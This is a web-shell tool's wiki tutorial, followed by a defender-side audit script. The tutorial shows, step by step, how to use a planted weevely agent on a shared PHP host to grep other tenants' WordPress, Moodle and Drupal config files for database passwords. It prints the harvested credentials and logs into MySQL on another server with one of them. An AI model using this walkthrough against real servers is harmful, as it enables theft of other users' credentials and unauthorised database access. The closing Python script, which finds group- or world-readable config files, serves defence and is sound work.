Harvest other users' credentials

Emilio edited this page Apr 25, 2015 · 3 revisions

This tutorial shows how to harvest other users' credentials on a shared hosting server that does not allow shell command execution.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: file_grep (grep)

Session

Find a folder containing the other users' web folders.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> ls
.
..
members
www-data@target:/var/www PHP> cd members
www-data@target:/var/www/members PHP> ls
.
..
alefst
anssot
latrwo
leempt
martol
natsta
rogjas
rotozy
tstanc
virots
yynost
www-data@target:/var/www/members PHP>

Now run the grep command (an alias for the file_grep module) with a raw regular expression to find hard-coded passwords stored in other users' PHP scripts. The regular expression skips lines that start with a comment (^[^*/#]) and matches lines that contain the word pass, optionally followed by word.

www-data@target:/var/www/members PHP> grep . '^[^*/#]*passw?o?r?d?'
./virots/config.php:$CFG->dbpass    = 'FFFklasdhas()asdjj';   // your database password
./anssot/moodle/config.php:$CFG->dbpass    = 'kasdhBSAUIGS77&';   // your database password
./leempt/wp/wp-config.php:define('DB_PASSWORD', 'AShasjdh177!@');
./alefst/wordpress/wp-config.php:define('DB_PASSWORD', 'ajhfaifh123!');
./martol/wordpress/wp-config.php:define('DB_PASSWORD', 'monkeydust1234');
./yynost/sites/default/settings.php:    'password' => 'XXyyynotsgoghia(XX',
./martol/drupal-7.x/sites/default/settings.php:    'password' => 'jhj@&&hgdas98k',
./natsta/drupal/sites/default/settings.php:    'password' => '99copacabana',
www-data@target:/var/www/members PHP> 

We found 8 credentials in one shot. We can also grep for statements that connect to MySQL.

www-data@target:/var/www/members PHP> grep . 'mysql_conn'
./rotozy/joosep-lineon/db.php:$g_link = mysql_connect( '10.4.4.24', 'rotozy', 'rotozy123') or die();
www-data@target:/var/www/members PHP>

Let's test the last one with the sql_console module.

www-data@target:/var/www/members PHP> :sql_console -user rotozy -passwd rotozy123 -host 10.4.4.7
rotozy@server7 SQL> SELECT USER();
+----------------+
| rotozy@server7 |
+----------------+
rotozy@server7 SQL> 

Gotcha.
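The session above works because a single shared PHP account can read every tenant's configuration file. As an added defender-side example (not weevely code and not part of this wiki), the Python script below audits a web root for CMS configuration files whose mode bits let group or world read them; the file names, the members/<user> layout and the sample tree it builds are assumptions modelled on the session.

```python
import os
import stat
import tempfile

# Well-known CMS configuration files that carry database credentials (assumed list)
CONFIG_NAMES = {"config.php", "wp-config.php", "settings.php", "db.php"}


def find_exposed_configs(root):
    """Return (relative_path, octal_mode, reason) for every config file
    under root whose mode bits let users other than the owner read it."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name not in CONFIG_NAMES:
                continue
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue  # skip symlinks and special files
            reasons = []
            if mode & stat.S_IRGRP:
                reasons.append("group-readable")
            if mode & stat.S_IROTH:
                reasons.append("world-readable")
            if reasons:
                rel = os.path.relpath(path, root)
                findings.append((rel, oct(stat.S_IMODE(mode)), ", ".join(reasons)))
    return sorted(findings)


def build_sample_tree():
    """Constructed fixture: one world-readable wp-config.php (0644) and one
    locked-down config.php (0600), mirroring the wiki's member folders."""
    root = tempfile.mkdtemp(prefix="members_")
    layouts = {"alefst/wordpress/wp-config.php": 0o644, "virots/config.php": 0o600}
    for rel, mode in layouts.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // constructed placeholder, no real secret\n")
        os.chmod(path, mode)  # set explicitly so the umask does not matter
    return root


if __name__ == "__main__":
    for rel, mode, reason in find_exposed_configs(build_sample_tree()):
        print(f"{rel}: mode {mode} is {reason}")
```

On a host where every site's PHP runs as one shared account, tightening modes alone is not enough: each tenant's PHP must run under its own user (separate php-fpm pools or an equivalent) for the separation to hold.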
